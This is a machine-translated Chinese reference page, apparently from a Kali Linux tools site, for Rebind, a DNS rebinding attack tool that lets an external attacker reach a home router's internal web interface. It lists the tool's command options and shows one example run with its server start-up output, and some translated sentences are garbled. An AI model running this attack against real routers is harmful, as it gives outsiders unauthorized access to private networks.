重新绑定包装说明
重新绑定是实现多个A记录DNS重新绑定攻击的工具。虽然这种工具在最初写入到目标家用路由器,它可以用于靶向任何公开的(非RFC1918)的IP地址。重新绑定提供一个外部攻击者访问目标路由器的内部Web界面。该工具适用于实现终端系统模型薄弱的IP协议栈的路由器,有专门配置的防火墙规则,谁是自己的Web服务绑定到路由器的WAN接口。注意,远程管理不需要启用此攻击工作。所有需要的是,所述目标网络冲浪到被控制,或已被破坏,由攻击者网站内的用户。 资料来源:https://code.google.com/p/rebind/
- 作者:克雷格·Heffner
许可:MIT
0x01 包括在重新绑定包工具
重新绑定 - DNS重新绑定工具
:~# rebind Rebind v0.3.4 Usage: rebind [OPTIONS] -i <interface> Specify the network interface to bind to -d <fqdn> Specify your registered domain name -u <user> Specify the Basic Authentication user name [admin] -a <pass> Specify the Basic Authentication password [admin] -r <path> Specify the initial URL request path [/] -t <ip> Specify a comma separated list of target IP addresses [client IP] -n <time> Specify the callback interval in milliseconds [2000] -p <port> Specify the target port [80] -c <port> Specify the callback port [81] -C <value> Specify a cookie to set for the client -H <file> Specify a file of HTTP headers for the client to send to the target
0x02 重新绑定用法示例
使用eth0接口 (-i eth0的),并进行 重新绑定攻击与指定域 (-d kali.local):
:~# rebind -i eth0 -d kali.local
[+] Starting DNS server on port 53
[+] Starting attack Web server on port 80
[+] Starting callback Web server on port 81
[+] Starting proxy server on 192.168.1.202:664
[+] Services started and running!
> dns
[+] 192.168.1.202 kali.local.
[+] 192.168.1.202 www.kali.local.
[+] 192.168.1.202 ns1.kali.local.
[+] 192.168.1.202 ns2.kali.local.
原文来自:https://www.hackfun.org/kali-tools/rebind_zh.html。转载请注明原出处,商用请联系原作者授权。